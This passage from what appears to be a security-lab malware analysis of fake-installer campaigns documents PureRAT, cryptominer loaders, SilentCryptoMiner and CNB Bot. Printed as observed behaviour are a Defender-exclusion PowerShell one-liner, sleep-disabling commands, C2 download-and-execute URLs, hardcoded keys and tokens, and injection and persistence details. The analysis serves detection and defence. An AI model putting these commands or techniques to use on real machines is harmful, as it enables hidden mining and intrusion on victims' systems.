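    expected = hmac.new(hmac_key, iv_and_ct, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)
```
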
<p>By decrypting traffic captured in VirusTotal sandboxes, we observed that the C2 server at <code>windirautoupdates[.]top</code> was automatically issuing a download-and-execute task directing the implant to fetch an XMR mining payload from <code>https://github[.]com/lebnabar198/Hgh5gM99fe3dG/raw/refs/heads/main/MnrsInstllr_240126[.]exe</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image24.png" alt="PureRAT initial task decryption" title="PureRAT initial task decryption" /></p>
<h2>Campaign 3 (PureRAT, PureMiner, XMRig loader)</h2>
<p>The third campaign variant shares the same initial-stage loader design as Campaigns 1 and 2. Its Stage 2 resembles Campaign 2 but differs by dropping multiple embedded payloads from the resource section, including PureRAT, a custom XMRig loader, and PureMiner.</p>
<p>Example ISO sample:</p>
<ul>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code></li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image40.png" alt="Installation of PureRAT, PureMiner, and a custom XMRig loader" title="Installation of PureRAT, PureMiner, and a custom XMRig loader" /></p>
<p>To keep the machine awake and maximize mining uptime, the loader disables sleep and hibernation via Windows power management commands:</p>
<ul>
<li><code>powercfg /change standby-timeout-ac 0</code></li>
<li><code>powercfg /change standby-timeout-dc 0</code></li>
<li><code>powercfg /change hibernate-timeout-ac 0</code></li>
<li><code>powercfg /change hibernate-timeout-dc 0</code></li>
</ul>
<p>The PureRAT configuration matches Campaign 2, differing only in the build/campaign ID: <code>25-11-25</code>.</p>
<p>The PE loader component of PureMiner is similar to PureRAT, and the decrypted module is also obfuscated via .NET Reactor. Since the configuration is Protobuf-serialized, hooking <code>ProtoBuf.Serializer::Deserialize</code> allows inspection of the configuration data:</p>
<ul>
<li><code>25-11-25</code> (build / campaign date)</li>
<li><code>wndlogon.hopto[.]org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb[.]com</code> (C2 #2)</li>
<li><code>wndlogon.ydns[.]eu</code> (C2 #3)</li>
<li><code>wndlogon.kozow[.]com</code> (C2 #4)</li>
<li><code>4c271ad41ea2f6a44ce8d0</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image41.png" alt="PureMiner decoded configuration" title="PureMiner decoded configuration" /></p>
<p>Additional behavioral indicators include the dynamic loading of AMD Display Library binaries (<code>atiadlxx.dll</code>/<code>atiadlxy.dll</code>) and the NVIDIA API library (<code>nvapi64.dll</code>), consistent with GPU hardware profiling techniques employed by PureMiner.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image1.png" alt="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" title="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" /></p>
<h3>Custom .NET-Based Loader for XMRig</h3>
<p>The following findings cover the custom XMRig loader deployed during this campaign. Analyzed samples:</p>
<ul>
<li><code>0176ffaf278b9281aa207c59b858c8c0b6e38fdb13141f7ed391c9f8b2dc7630</code></li>
<li><code>9409f9c398645ddac096e3331d2782705b62e388a8ecb1c4e9d527616f0c6a9e</code></li>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code></li>
</ul>
<h4>The Entry Point and Setup</h4>
<p>Execution begins in the <code>Start()</code> method. The loader first calls <code>FetchRemoteConfig()</code>, which reaches out to a hardcoded URL (<code>https://autoupdatewinsystem[.]top/MyMNRconfigs/0226.txt</code>). The response is AES-encrypted JSON, which the loader decrypts using a hardcoded key (<code>AsyncPrivateInputx64</code>) and parses to extract the pool, wallet, and mining arguments. If the remote server is unreachable or decryption fails, it falls back to a hardcoded <code>ztbpVbABSx1jDIKnWGbx1d_0</code> configuration to ensure mining can still occur.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image26.png" alt="The hard-coded configuration when the online config is unavailable" title="The hard-coded configuration when the online config is unavailable" /></p>
<h4>Resource Extraction</h4>
<p>Simultaneously, an asynchronous task triggers <code>ExtractResources()</code>. The loader checks the <code>%TEMP%</code> directory for two files: <code>procsrv.exe</code> (the renamed XMRig payload) and <code>WinRing0x64.sys</code> (a driver used by XMRig for direct hardware access). If either is absent, the loader unpacks them from its own assembly manifest.</p>
<h4>Evasion Loop</h4>
<p>After a 3-second sleep, the loader calls <code>StartEvasionTimer()</code>, initializing a timer that ticks every 1,000 milliseconds. On each tick, <code>IsAnalysisToolRunning()</code> compares all running process names against a hardcoded list of 35 security and monitoring tools (<code>Taskmgr</code>, <code>ProcessHacker</code>, <code>Wireshark</code>, <code>Procmon</code>, etc.).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image34.png" alt="Monitoring tools that are targeted" title="Monitoring tools that are targeted" /></p>
<p>If any analysis tool is detected, the loader immediately calls <code>KillMinerProcess()</code>, terminating <code>procsrv.exe</code>, effectively dropping the CPU usage back to normal.</p>
<p>If no analysis tool is detected, the loader calls <code>CheckAndRunMiner()</code>. If the miner is not currently running, it reconstructs the command-line arguments (using the remote or fallback config) and quietly launches the miner as a hidden background process via <code>LaunchMiner()</code>.</p>
<p>This creates a &quot;hide and seek&quot; scenario for the victim. Whenever they try to investigate why their PC is slow, the malware shuts down the miner.</p>
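<p>The per-tick decision logic of the evasion timer amounts to the following. This is a schematic Python reconstruction, not the actor's .NET code, and the blocklist shown is only a small subset of the 35 names:</p>

```python
BLOCKLIST = {"taskmgr", "processhacker", "wireshark", "procmon"}  # subset of 35


def next_action(running_processes, miner_running):
    """One tick of the 1,000 ms evasion timer."""
    if any(name.lower() in BLOCKLIST for name in running_processes):
        return "kill_miner"    # KillMinerProcess(): CPU usage drops to normal
    if not miner_running:
        return "launch_miner"  # CheckAndRunMiner() re-launches hidden miner
    return "noop"
```
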
<h4>WinRing0x64.sys and Ring 0 Access</h4>
<p>The loader also drops and loads <code>WinRing0x64.sys</code>, a legitimate open-source driver frequently abused by cryptominers. The driver provides direct Ring 0 (kernel-level) hardware access, which XMRig uses to apply its Model Specific Register (MSR) modification, reconfiguring CPU prefetcher and L3 cache behavior to significantly boost RandomX (Monero) hash rates.</p>
<h2>Campaign 4 - Umnr_ (SilentCryptoMiner)</h2>
<p>From the <code>autoupdatewinsystem[.]top</code> domain, we identified a GitHub account, <code>https://github[.]com/ugurlutaha6116</code>, hosting another loader variant whose executable name is prefixed with <code>Umnr_</code>. This loader is a Themida-packed SilentCryptoMiner loader that installs persistently on the victim machine, injects a watchdog payload into <code>conhost.exe</code> and a miner payload into <code>explorer.exe</code>, and mines ETH or XMR depending on the build configuration.</p>
<p>SilentCryptoMiner is a closed-source Win32 64-bit malware released for free on <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner">GitHub</a>. The samples we analyzed are older versions than the latest <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner/releases">release</a>:</p>
<ul>
<li><code>1f7441d72eff2e9403be1d9ce0bb07792793b2cb963f2601ecfdf8c91cd9af73</code></li>
<li><code>468441d32f62520020d57ff1f24bb08af1bc10e9b4d4da1b937450f44e80a9be</code></li>
<li><code>4e6b8fdd819293ca3fe8f8add6937bf6531a936955d9ac974a6b231823c7330e</code></li>
<li><code>6492e50e79b979254314988228a513d5acbdaa950346414955dc052ae77d2988</code></li>
<li><code>ce90cb3a9bfb8a276cb50462be932e063ed408af8c5591dd2c50f1c6d18c394c</code></li>
</ul>
<h4>Direct Syscalls</h4>
<p>To evade detection, SilentCryptoMiner uses direct syscalls instead of <code>NTDLL</code> functions. To do this, it parses <code>NTDLL</code> exports to locate the target function by a hash of its name, extracts the syscall number, and manually executes the syscall instruction sequence.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image36.png" alt="Direct syscall procedure" title="Direct syscall procedure" /></p>
<h4>Disable Sleep and Hibernate</h4>
<p>To ensure it can use the host machine for as long as possible, SilentCryptoMiner disables Windows sleep and hibernation by executing a shell command.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image5.png" alt="Disable windows sleep and hibernate" title="Disable windows sleep and hibernate" /></p>
<h4>Install Persistence</h4>
<p>After copying itself to its installation folder (in this case, configured to masquerade as legitimate software named “<code>Appdata/Local/OptimizeMS/optims.exe</code>”), SilentCryptoMiner proceeds to establish persistence. If the process is running with administrator privileges, it creates a scheduled task configured via an XML file.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image8.png" alt="Schtask task creation for persistence" title="Schtask task creation for persistence" /></p>
<p>The XML file is dropped onto the disk in the <code>AppData/Local/Temp</code> folder and contains the task configuration. One interesting setting is <code>AllowHardTerminate = False</code>, which prevents the Task Scheduler from forcibly terminating the running task.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image14.png" alt="Malware XML task configuration" title="Malware XML task configuration" /></p>
<p>If the process lacks administrator rights, it instead adds a <strong>Run</strong> key to the registry.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image35.png" alt="Malware adds a run key for persistence if not running as administrator" title="Malware adds a run key for persistence if not running as administrator" /></p>
<p>After initial installation, the process terminates. On subsequent execution by the persistence mechanism, it verifies that it is running from its installation directory before proceeding to the process injection phase.</p>
<h4>Inject watchdog and miner payloads</h4>
<p>In the samples we analyzed, the builds contain four payloads:</p>
<ul>
<li>A <code>Winring0.sys</code> driver</li>
<li>A watchdog process</li>
<li>A Monero miner</li>
<li>An Ethereum miner</li>
</ul>
<p>The builds can contain multiple miners; however, in our tests, we only observed the Monero miner injected into a process. In the code, only one of the two miners is injected, which we assume depends on the build configuration.</p>
<p>SilentCryptoMiner initiates injection by creating a new suspended process with a spoofed parent process. It obtains a handle to <code>explorer.exe</code> using <code>NtQuerySystemInformation</code> and <code>NtOpenProcess</code>, then configures a <code>PS_ATTRIBUTE_LIST</code> structure with the handle for parent spoofing and passes it to <code>NtCreateUserProcess</code>.</p>
<p>The payload is written to disk via <code>NtCreateFile</code> and <code>NtWriteFile</code>, then mapped into the target process's memory space through <code>NtCreateSection</code> and <code>NtMapViewOfSection</code>. Execution flow is hijacked by modifying the suspended process's entry point (in the <code>RCX</code> register) to point to the payload's image base using <code>NtGetContextThread</code> and <code>NtSetContextThread</code>. The process's PEB (in <code>RDX</code> register) image base is also set to the payload's address using <code>NtWriteVirtualMemory</code>. Finally, the process is resumed with <code>NtResumeThread</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image21.png" alt="Process injection procedure" title="Process injection procedure" /></p>
<p>The payload data is decrypted from a hardcoded blob in the binary using a simple XOR cipher with a hardcoded key. After injection, the blob is re-encrypted in memory to reduce forensic traces.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image15.png" alt="Decrypts, injects, and re-encrypts payload" title="Decrypts, injects, and re-encrypts payload" /></p>
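<p>The XOR scheme is symmetric, which is what makes the re-encryption step cheap: applying the same operation a second time restores the original bytes. A minimal sketch (the key and data below are placeholders, not the actual hardcoded values):</p>

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```

Because the operation is its own inverse, the malware can decrypt the payload blob, inject it, and then run the identical routine again to leave only ciphertext resident in memory.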
<p>In the analyzed samples, SilentCryptoMiner utilizes two distinct processes for payload injection: the watchdog component is injected into <code>conhost.exe</code>, while the miner payload targets <code>explorer.exe</code>. The <code>WinRing0.sys</code> driver is also written to disk, then loaded and used by the miner, likely to optimize the CPU for mining operations.</p>
<h4>Watchdog and Miner Processes</h4>
<p>The watchdog is responsible for monitoring the loader file in its persistence folder: it rewrites the file to disk if it is deleted and reinstalls the persistence mechanism if the scheduled task or registry key is deleted.</p>
<p>The miner downloads its configuration from <code>(/UWP1)?/*CPU.txt</code> endpoints and, depending on the version, communicates with its C2 via the <code>[UWP1|UnamWebPanel7]/api/endpoint.php</code> API.</p>
<p>Based on the documentation and memory strings, we know that the miner includes supplementary protection measures: like the .NET miner detailed previously, it halts mining operations when it detects specific blocklisted processes, spanning tools used for process monitoring, network monitoring, antivirus protection, and reverse engineering.</p>
<h2>Code analysis - CNB Bot</h2>
<p>CNB Bot is a .NET implant with integrated loader capabilities. It implements a command-polling loop against its configured C2 servers and supports three operator commands:</p>
<ul>
<li>download-and-execute arbitrary payloads</li>
<li>self-update</li>
<li>uninstall/cleanup</li>
</ul>
<p>On Jan 31, 2026, malware researcher <a href="https://x.com/ViriBack/status/2017388775978967074">@ViriBack</a> discovered a related C2 panel that was exposed at <code>https://win64autoupdates[.]top/CNB/l0g1n234[.]php</code>, which has since been taken offline.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image16.png" alt="CNB Bot leaked panel" title="CNB Bot leaked panel" /></p>
<h3>Configuration</h3>
<p>Some configuration values for CNB Bot are not encrypted, such as the bot version (<code>1.1.6.</code>), campaign date (<code>03_26</code>), and the scheduled task name for persistence (<code>HostDataPlugin</code>).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image11.png" alt="Bot version and campaign ID in plaintext" title="Bot version and campaign ID in plaintext" /></p>
<p>Sensitive strings (C2 URLs, mutex name, auth token, comms key) are stored AES-256-CBC encrypted with a hardcoded 32-byte key, which differs across campaign batches.</p>
<p>Strings can be decrypted with the following routine, shown here as a Python sketch using PyCryptodome (PKCS#7 padding remains on the tail of the plaintext):</p>
<pre><code>import base64
from Crypto.Cipher import AES  # pycryptodome

raw = base64.b64decode(data)
decrypted = AES.new(hard_coded_key, AES.MODE_CBC, iv=raw[:16]).decrypt(raw[16:])
</code></pre>
<p>Extracted configuration:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Mutex Name</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
<tr>
<td align="left">C2 URL</td>
<td align="left"><code>https://tabbysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #1</td>
<td align="left"><code>https://tommysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #2</td>
<td align="left"><code>https://tommysbakescodes[.]cv/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Auth Token</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code></td>
</tr>
<tr>
<td align="left">Comms AES Key (input)</td>
<td align="left"><code>AnCnDai@4zDsxP!a3E</code></td>
</tr>
<tr>
<td align="left">Scheduled Task</td>
<td align="left"><code>HostDataProcess</code></td>
</tr>
<tr>
<td align="left">Install Dir</td>
<td align="left"><code>%APPDATA%\HostData\</code></td>
</tr>
<tr>
<td align="left">Marker File</td>
<td align="left"><code>%APPDATA%\HostData\install.dat</code></td>
</tr>
<tr>
<td align="left">Executable</td>
<td align="left"><code>sysdata.exe</code></td>
</tr>
<tr>
<td align="left">Group / Campaign</td>
<td align="left"><code>03_26</code></td>
</tr>
<tr>
<td align="left">Bot Version</td>
<td align="left"><code>1.1.6.</code></td>
</tr>
</tbody>
</table>
<h3>Execution Flow</h3>
<p>At startup, CNB Bot performs five VM-detection checks:</p>
<table>
<thead>
<tr>
<th align="left">Check</th>
<th align="left">Technique</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">WMI ComputerSystem</td>
<td align="left">Manufacturer/Model: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;xen&quot;, &quot;parallels&quot;, &quot;innotek&quot;, &quot;microsoft corporation&quot; (manufacturer) + &quot;virtual machine&quot; (model)</td>
</tr>
<tr>
<td align="left">WMI BIOS</td>
<td align="left">Version/Serial: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;bochs&quot;, &quot;seabios&quot;</td>
</tr>
<tr>
<td align="left">Process list</td>
<td align="left">&quot;vmtoolsd&quot;, &quot;vmwaretray&quot;, &quot;vmwareuser&quot;, &quot;vboxservice&quot;, &quot;vboxtray&quot;, &quot;xenservice&quot;</td>
</tr>
<tr>
<td align="left">Registry</td>
<td align="left">VMware Tools / VirtualBox Guest Additions keys: &quot;SOFTWARE\VMware, Inc.\VMware Tools&quot;, &quot;SOFTWARE\Oracle\VirtualBox Guest Additions&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxGuest&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxSF&quot;</td>
</tr>
<tr>
<td align="left">MAC Address</td>
<td align="left">&quot;00:0C:29&quot;, &quot;00:50:56&quot;, &quot;00:05:69&quot;, &quot;08:00:27&quot;, &quot;0A:00:27&quot;, &quot;00:16:3E&quot;, &quot;00:1C:14&quot;</td>
</tr>
</tbody>
</table>
<p>Each check returns zero or one, and the results are summed against a threshold. When the detection threshold is reached, the first process instance acquires a named mutex and enters an infinite sleep (<code>Thread.Sleep(int.MaxValue)</code>), appearing hung rather than terminating cleanly. Any subsequent instance that finds the mutex already held exits immediately.</p>
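<p>The aggregation logic can be sketched as follows. This is a schematic reconstruction; the threshold value of 2 is a placeholder assumption, not recovered from the sample:</p>

```python
def is_vm(checks, threshold=2):
    """Each check callable returns 0 or 1; the scores are summed and
    compared against a threshold (the value 2 is an assumed placeholder)."""
    score = sum(check() for check in checks)
    return score >= threshold
```

A score-and-threshold design tolerates single false positives (e.g., a physical host whose MAC prefix happens to collide) while still tripping on environments that match several heuristics at once.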
<p>Otherwise, on first execution, the implant checks for <code>%APPDATA%\HostData\install.dat</code>. If absent, it performs the initial installation:</p>
<ul>
<li>Generates a random 5-character alphabetic subdirectory name under <code>%APPDATA%\HostData\</code></li>
<li>Copies itself to <code>%APPDATA%\HostData\&lt;random&gt;\sysdata.exe</code></li>
<li>Writes the installed path to <code>install.dat</code></li>
<li>Extracts benign dependencies <code>DiagSvc.dll</code> and <code>sdrsvc.dll</code> into the same directory</li>
<li>Writes a VBScript wrapper <code>sysdata.vbs</code> alongside the binary: <code>CreateObject(&quot;WScript.Shell&quot;).Run &quot;&quot;&quot;&lt;installed_path&gt;&quot;&quot;&quot;, 0, False</code></li>
<li>Creates a scheduled task named <code>HostDataProcess</code> via schtasks.exe, configured to run <code>wscript.exe //nologo sysdata.vbs</code> every 10 minutes at <code>HIGHEST</code> privilege</li>
<li>Launches the installed copy as a hidden process with <code>%TEMP%</code> as the working directory</li>
<li>Self-deletes the original copy via a self-deleting BAT script (<code>timeout /t 3</code>, <code>loop-del</code>)</li>
</ul>
<p>On subsequent runs, when <code>install.dat</code> exists and the running path matches its contents, the implant proceeds to active operation:</p>
<ul>
<li>Sets the current working directory to <code>%TEMP%</code></li>
<li>Repairs persistence: checks if <code>sysdata.vbs</code> exists (recreates if absent) and verifies the scheduled task is configured with <code>wscript.exe</code>, re-registering it if necessary</li>
<li>Acquires a named mutex (<code>MTXCNBV11000ERCXSWOLZNBVRGH</code>) - exits if already running</li>
<li>Instantiates the victim profiler, C2 comms, and command dispatcher</li>
<li>Issues a single POST to the C2 with <code>payload: &quot;fetch&quot;</code>, handles any returned task</li>
<li>Exits - next execution is driven entirely by the 10-minute scheduled task trigger</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image7.png" alt="CNB Bot main code logic" title="CNB Bot main code logic" /></p>
<h3>C2 Communication</h3>
<p>The malware communicates with its C2 by issuing HTTP POST requests with the Content-Type set to <code>application/x-www-form-urlencoded</code>. Each field value is independently AES-256-CBC encrypted with a random IV. The AES key is derived as the SHA-256 hash of the hardcoded communications passphrase (<code>AnCnDai@4zDsxP!a3E</code>). The IV is prepended to the ciphertext, and the entire blob is base64-encoded; C2 responses follow the same format.</p>
<pre><code>encrypted_field_value = base64_encode(random_iv + AES-256-CBC_encrypt\
 (key: SHA-256('AnCnDai@4zDsxP!a3E'), iv: random_iv, data: plaintext_field_value))
</code></pre>
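<p>In practice, recovering a field value therefore requires only the passphrase. The following Python sketch covers the key derivation and blob layout; the AES-CBC decryption step itself would need a crypto library such as PyCryptodome and is left as a comment:</p>

```python
import base64
import hashlib

AES_KEY = hashlib.sha256(b"AnCnDai@4zDsxP!a3E").digest()  # 32-byte AES-256 key


def split_field(value_b64: str):
    """Decode a field value into its IV (first 16 bytes) and ciphertext."""
    blob = base64.b64decode(value_b64)
    iv, ciphertext = blob[:16], blob[16:]
    # plaintext = AES.new(AES_KEY, AES.MODE_CBC, iv).decrypt(ciphertext)
    return iv, ciphertext
```
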
<p>Fields sent on every request:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>desktop</code></td>
<td align="left">machine name</td>
</tr>
<tr>
<td align="left"><code>username</code></td>
<td align="left">username</td>
</tr>
<tr>
<td align="left"><code>os</code></td>
<td align="left">Windows version</td>
</tr>
<tr>
<td align="left"><code>version</code></td>
<td align="left">bot version (<code>1.1.6.</code>)</td>
</tr>
<tr>
<td align="left"><code>privileges</code></td>
<td align="left">user OR admin</td>
</tr>
<tr>
<td align="left"><code>cpu</code></td>
<td align="left">processor name from the registry</td>
</tr>
<tr>
<td align="left"><code>gpu</code></td>
<td align="left">GPU name(s) from registry</td>
</tr>
<tr>
<td align="left"><code>gpu_type</code></td>
<td align="left">yes (discrete) / no (integrated)</td>
</tr>
<tr>
<td align="left"><code>group</code></td>
<td align="left">group / campaign ID (<code>03_26</code>)</td>
</tr>
<tr>
<td align="left"><code>client_path</code></td>
<td align="left">full path of running executable</td>
</tr>
<tr>
<td align="left"><code>local_ipv4</code></td>
<td align="left">external IP via <code>ipify[.]org</code> / <code>icanhazip[.]com</code> / <code>ident[.]me</code></td>
</tr>
<tr>
<td align="left"><code>auth_token</code></td>
<td align="left">authentication token (<code>0326GJSECMHSHOEYHQMKDZ</code>)</td>
</tr>
<tr>
<td align="left"><code>timestamp</code></td>
<td align="left">Unix epoch (UTC)</td>
</tr>
<tr>
<td align="left"><code>payload</code></td>
<td align="left">Command string (“fetch”, “completed”)</td>
</tr>
</tbody>
</table>
<p>A server response decrypts to either a task string, <code>&quot;NO TASKS&quot;</code>, or <code>&quot;REGISTERED/UPDATED&quot;</code>. When the client requests a task through <code>payload: &quot;fetch&quot;</code> and a task exists for that client, the C2 response decrypts to a <code>&lt;sep&gt;</code>-delimited task string: <code>task_id&lt;sep&gt;command&lt;sep&gt;argument&lt;sep&gt;RSA_sig</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image32.png" alt="CNB Bot dispatcher function" title="CNB Bot dispatcher function" /></p>
<p>Prior to dispatch, each task undergoes RSA-SHA256 signature verification. The signed message is the concatenated string <code>task_id&lt;sep&gt;command&lt;sep&gt;argument</code>, and the signature is the base64-decoded <code>RSA_sig</code> field. A hardcoded RSA-2048 public key is used for verification.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image20.png" alt="RSA-SHA256 task verification" title="RSA-SHA256 task verification" /></p>
<p>Tasks failing verification are silently dropped. Without the operator's RSA private key, third parties cannot issue commands to infected hosts even with full C2 access.</p>
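<p>Schematically, the dispatch-side handling looks like this. In the Python sketch below, the delimiter token is a placeholder (the actual separator differs), and the RSA-SHA256 verification against the hardcoded public key, which would need a crypto library, is omitted:</p>

```python
def parse_task(decrypted: str, sep="|"):  # sep is a placeholder token
    """Split a task string into its fields and rebuild the signed message
    that the RSA-SHA256 signature is verified over."""
    task_id, command, argument, rsa_sig_b64 = decrypted.split(sep)
    signed_message = sep.join((task_id, command, argument))
    return task_id, command, argument, signed_message, rsa_sig_b64
```
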
<h3>Supported Commands</h3>
<p>Three commands are supported, described in the table below:</p>
<table>
<thead>
<tr>
<th align="left">Command</th>
<th align="left">Behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>download_execute</code></td>
<td align="left">Downloads URL argument to <code>%TEMP%\&lt;random&gt;.&lt;ext&gt;</code>. Execute: .exe (hidden), .bat/.cmd (cmd /c), .vbs (wscript.exe), other (ShellExecute).</td>
</tr>
<tr>
<td align="left"><code>update</code></td>
<td align="left">Downloads URL argument to staging location <code>%TEMP%\tmp_updt236974520367.exe</code>. Runs BAT to: kill current PID, overwrite installed binary with staged download, delete staging file, and self-delete BAT.</td>
</tr>
<tr>
<td align="left"><code>uninstall</code></td>
<td align="left">Deletes scheduled task, removes <code>install.dat</code>, self-deletes via BAT, rmdir install dir, and <code>%APPDATA%\HostData\</code>.</td>
</tr>
</tbody>
</table>
<h2>Earlier Campaigns</h2>
<p>Pivoting on the PureRAT mutex <code>Aesthetics135</code>, we discovered an earlier wave of the operation that presented a different fake installer UI.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image25.png" alt="Fake installer interface from early 2025" title="Fake installer interface from early 2025" /></p>
<h3>Early 2025 Build</h3>
<p>The sample <code>bb48a52bae2ee8b98ee1888b3e7d05539c85b24548dd4c6acc08fbe5f0d7631a</code> (first seen 2025-01-30) is a Themida and .NET Reactor-protected Windows Forms application that drops PureRAT v0.3.9.</p>
<p>It consists of three classes: <code>Fooo1rm</code> (the ApplicationContext entry point), <code>Form2</code> (the installer UI and the PureRAT dropper), and <code>Form3</code> (a fake registration lure). The code structure closely resembles the more recent campaigns.</p>
<p>On initialization, it immediately invokes a hidden PowerShell one-liner to add itself to Microsoft Defender exclusions before any UI appears: <code>powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath '&lt;self_path&gt;'; Add-MpPreference -ExclusionProcess '&lt;self_path&gt;'</code>. A timer with a 2,846 ms interval fires, instantiating and showing Form2.</p>
<p><code>Form2</code> presents a progress bar dialog titled “Getting things ready” with a 12-step timer ticking every 1,000 ms, simulating a legitimate installation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image18.png" alt="Fake loading bar" title="Fake loading bar" /></p>
<p>A second PowerShell exclusion command covers <code>%LocalAppData%</code>, <code>%AppData%</code>, the drop directory <code>%LocalAppData%\winbuf</code>, and process names including <code>winbuf.exe</code>, <code>wintrs.exe</code>, and <code>AddlnProcess.exe</code>. The PureRAT v0.3.9 payload is extracted from the assembly manifest resource and written to <code>%LocalAppData%\winbuf\winbuf.exe</code>. Persistence is established via <code>schtasks.exe</code>.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>29-01-25</code> (build / campaign date)</li>
</ul>
<p><code>Form3</code> serves purely as a social engineering mechanism to drive <a href="https://en.wikipedia.org/wiki/Cost_per_action">Cost Per Action</a> (CPA) offer completions through a content locker.</p>
<blockquote>
<p>Content lockers are a monetization technique in which access to a resource is gated behind completing CPA (Cost Per Action) offers, such as filling out a survey or signing up for a service. The malware operator earns a commission each time a victim completes one of these offers.</p>
</blockquote>
<p>It presents a fake “Registration Required” dialog with a key entry field, a “Validate” button, and a hyperlink labeled “here” that opens <code>https://tinyurl[.]com/cmvt944y</code>. Key validation is entirely fake. Regardless of input, the handler introduces a hardcoded 2-second delay, then always returns “Invalid key. Please try again.”</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image2.png" alt="Fake registration key input invalidation" title="Fake registration key input invalidation" /></p>
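<p>Stripped of its WinForms scaffolding, the handler's logic reduces to the following sketch (the original is C#; the function name and delay parameter are ours):</p>

```python
import time

def validate_key(user_input: str, delay: float = 2.0) -> str:
    """Mimic the Form3 'Validate' handler: wait a fixed interval so the
    check looks server-side, then reject every input unconditionally."""
    time.sleep(delay)  # hardcoded 2-second delay in the real sample
    return "Invalid key. Please try again."
```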
<p>The TinyURL shortlink <code>tinyurl[.]com/cmvt944y</code> redirects to the lure page at <code>rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/</code>.</p>
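<p>Indicators in this post are defanged with <code>[.]</code>. When reproducing redirect chains like this one, a small helper keeps the IOCs copy-pasteable; the network call should only ever be made from isolated analysis infrastructure:</p>

```python
import urllib.request

def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a usable host or URL."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def resolve_redirect(url: str) -> str:
    """Follow HTTP redirects and return the final landing URL."""
    with urllib.request.urlopen(url) as resp:
        return resp.geturl()

# Sandbox-only usage:
#   resolve_redirect("https://" + refang("tinyurl[.]com/cmvt944y"))
```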
<p>The page previously hosted a minimal HTML document titled &quot;Registration Key is Ready&quot;, designed to trick the victim into interacting with the CPA content locker. It presents a download icon and a fake file link labeled <code>Registration_Key.txt</code>, alongside a unique campaign tracking ID (<code>z872d515ea17b4e6c3abca9752c706242</code>) displayed in the page body.</p>
<p>The content locker JavaScript (<code>3193171.js</code>) is loaded from <code>d3nxbjuv18k2dn.cloudfront[.]net</code>, and clicking the <code>Registration_Key.txt</code> link triggers the offer wall under the pretext of unlocking a license key.</p>
